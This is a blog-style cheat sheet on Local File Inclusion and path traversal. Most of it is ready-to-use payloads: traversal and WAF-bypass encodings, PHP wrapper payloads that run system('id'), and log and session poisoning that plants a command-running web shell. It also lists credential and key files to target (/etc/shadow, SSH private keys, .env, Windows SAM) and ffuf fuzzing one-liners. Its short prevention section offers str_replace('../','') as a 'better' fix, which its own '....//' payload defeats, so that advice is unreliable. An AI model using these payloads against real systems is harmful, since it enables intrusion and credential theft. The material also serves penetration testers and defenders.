bughra.dev
Go back

Local File Inclusion (LFI) & Path Traversal

Introduction

Local File Inclusion (LFI)

LFI vulnerabilities allow an attacker to include files on a server through the web browser. This vulnerability occurs when a web application includes a file without properly sanitizing the input, allowing attackers to access sensitive files on the server.

Path Traversal (Directory Traversal)

Path Traversal allows an attacker to access files and directories outside of the web root folder by manipulating variables that reference files with ”../” sequences and its variations.

Basic Exploitation Techniques

Standard Path Traversal Vectors

http://example.com/index.php?page=../../../etc/passwd
http://example.com/index.php?file=../../../etc/passwd
http://example.com/index.php?file=/etc/passwd

Common Vulnerable Parameters

page
file
path
dir
document
folder
root
conf
inc
include
show
target
path
style
pdf
template
php_path

Path Traversal Techniques

Basic Directory Traversal

../
../ (multiple)
../../../
....//....//....//

Absolute Paths (when directory traversal is filtered)

/etc/passwd
/var/www/html/index.php
C:\Windows\System32\drivers\etc\hosts

WAF Bypass Techniques

1. Path & Slash Obfuscation

..././
...\.\
.././
./././
..//..//
..////
..\..\
..%252f..%252f
%2e%2e%2f
%2e%2e/
..%c0%af
%5c../
..\
..%255c

2. Encoding Techniques

URL Encoding

%2e%2e%2f = ../
%2e%2e/ = ../
%2f = /
%5c = \

Double URL Encoding

%252e%252e%252f = ../
%252f = /

Unicode/UTF-8 Encoding

%c0%ae%c0%ae%c0%af = ../
%e0%80%ae%e0%80%ae%e0%80%af = ../

3. Path Normalization Bypass

..././
....//
.././
./././
..//..//

4. Null Byte Injection (works in older PHP versions)

../../../etc/passwd%00
../../../etc/passwd\0
../../../etc/passwd%00.jpg
../../../etc/passwd%2500

5. Traversal Sequence Variation

..../
....\
....//
....\\
..../////

6. Protocol Exploitation

file:///etc/passwd
php://filter/convert.base64-encode/resource=/etc/passwd

Advanced LFI Exploitation

PHP Wrappers & Filters

# Base64 encode to avoid execution and read source
php://filter/convert.base64-encode/resource=index.php

# Read source code without execution
php://filter/read=convert.base64-encode/resource=index.php

# Execute commands
php://input
[POST data: <?php system('id'); ?>]

# Execute from data
data://text/plain,<?php system('id'); ?>
data://text/plain;base64,PD9waHAgc3lzdGVtKCdpZCcpOyA/Pg==

# Zip wrapper
zip://path/to/uploaded/file.zip#phpscript.php

Log Poisoning (Log File Inclusion)

# User-Agent poisoning
User-Agent: <?php system($_GET['cmd']); ?>

# Then access log file
http://example.com/index.php?page=../../../var/log/apache2/access.log&cmd=id
/var/log/apache2/access.log
/var/log/apache2/error.log
/var/log/httpd/access_log
/var/log/httpd/error_log
/var/log/nginx/access.log
/var/log/nginx/error.log
/proc/self/environ
/proc/self/fd/X

Session File Inclusion

# Set PHP code in a cookie or request parameter used in session
Cookie: PHPSESSID=<?php system('id'); ?>

# Then include the session file
http://example.com/index.php?page=../../../var/lib/php/sessions/sess_[SESSIONID]
/var/lib/php/sessions/sess_*
/tmp/sess_*
/tmp/sessions/*
C:\Windows\Temp\*.php*

/proc/ Exploitation

/proc/self/environ
/proc/self/cmdline
/proc/self/fd/0
/proc/self/fd/1
/proc/self/fd/2
/proc/self/maps

Common Files to Target

Unix / Linux

/etc/passwd
/etc/shadow
/etc/hosts
/etc/hostname
/etc/issue
/etc/group
/etc/mysql/my.cnf
/etc/ssh/sshd_config
/etc/resolv.conf
/home/[user]/.bash_history
/home/[user]/.ssh/id_rsa
/home/[user]/.ssh/authorized_keys
/var/log/auth.log
/var/www/html/index.php
/var/www/html/wp-config.php
/var/www/html/configuration.php
/var/www/html/config.php
/var/www/html/.env

Windows

C:\Windows\System32\drivers\etc\hosts
C:\Windows\win.ini
C:\WINDOWS\system32\eula.txt
C:\boot.ini
C:\inetpub\wwwroot\web.config
C:\Windows\repair\sam
C:\Windows\repair\system
C:\Windows\repair\software
C:\Windows\panther\unattend.xml
C:\Users\[username]\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

Application-specific Files

# Apache
/etc/apache2/apache2.conf
/etc/apache2/httpd.conf
/etc/apache2/sites-enabled/000-default.conf

# PHP
/etc/php/X.Y/php.ini
/etc/php-fpm.d/www.conf

# MySQL
/etc/mysql/my.cnf
/var/lib/mysql/mysql/user.MYD

# WordPress
/var/www/html/wp-config.php

# Magento
/app/etc/local.xml

# Drupal
/sites/default/settings.php

# Laravel
/.env

# Joomla
/configuration.php

Chaining Techniques for WAF Bypass

1. Multiple Encoding + Traversal

%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd

2. Path Truncation + Null Byte

../../../../../../../../../etc/passwd.........................x%00

3. Combining Different Encoding Types

%25%32%65%25%32%65%25%32%66etc%25%32%66passwd
..%c0%af..%c0%af..%c0%afetc%c0%afpasswd

4. Mixed Traversal Sequences

....//....//....//etc/passwd
..../\../\../\../etc/passwd
../\../\../\../etc/passwd

5. Protocol Wrappers + Encoding

php://filter/convert.base64-encode/resource=%2e%2e%2f%2e%2e%2fetc%2fpasswd

Preventing and Mitigating LFI/Path Traversal

Input Validation & Sanitization

// Bad - Vulnerable
include($_GET['file']);

// Better - Whitelist validation
$allowed_files = ['home', 'about', 'contact'];
if (in_array($_GET['file'], $allowed_files)) {
    include($_GET['file'] . '.php');
}

// Better - Remove traversal sequences
$file = str_replace('../', '', $_GET['file']);

Secure Configurations

# PHP settings
allow_url_fopen = Off
allow_url_include = Off

# Apache settings
<Directory />
    Options -Indexes
    AllowOverride None
</Directory>

Tools for Detecting and Exploiting LFI

Automated Tools

  1. LFISuite: https://github.com/D35m0nd142/LFISuite
  2. LFImap: https://github.com/hansmach1ne/LFImap
  3. liffy: https://github.com/mzfr/liffy
  4. kadimus: https://github.com/P0cL4bs/kadimus
  5. ffuf: https://github.com/ffuf/ffuf (For fuzzing potentially vulnerable parameters)
  6. Burp Suite - Intruder with path traversal payloads

One-liner Scripts

# Enumerate potential LFI parameters
ffuf -w /path/to/params.txt -u "http://target.com/index.php?FUZZ=value" -fs 4242

# Test for LFI vulnerability
ffuf -w /path/to/traversal.txt -u "http://target.com/index.php?page=FUZZ" -fs 4242

# Fuzz both parameter and traversal path
ffuf -w /path/to/params.txt:PARAM -w /path/to/traversal.txt:TRAVERSE -u "http://target.com/index.php?PARAM=TRAVERSE" -fs 4242

Real-World Examples

Example 1: Simple LFI

http://vulnerable.com/index.php?page=../../../etc/passwd

Example 2: WAF Bypass with Encoding

http://vulnerable.com/index.php?page=%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd

Example 3: PHP Filter Wrapper Bypass

http://vulnerable.com/index.php?page=php://filter/convert.base64-encode/resource=../../../etc/passwd

Example 4: Double URL-encoded Null Byte + Traversal

http://vulnerable.com/index.php?page=../../../etc/passwd%2500

Example 5: Controlling PHP Session Content

# Set a malicious session variable
curl -X POST "http://vulnerable.com/login.php" -d "username=<?php system('id'); ?>"

# Include the session file
http://vulnerable.com/index.php?page=../../../var/lib/php/sessions/sess_[SESSIONID]

References

Share this post on:
Share this post via WhatsApp Share this post on Facebook Share this post on X Share this post via Telegram Share this post on Pinterest Share this post via email
Previous Post
JSON Web Token (JWT) Security
Next Post
File Upload Vulnerabilities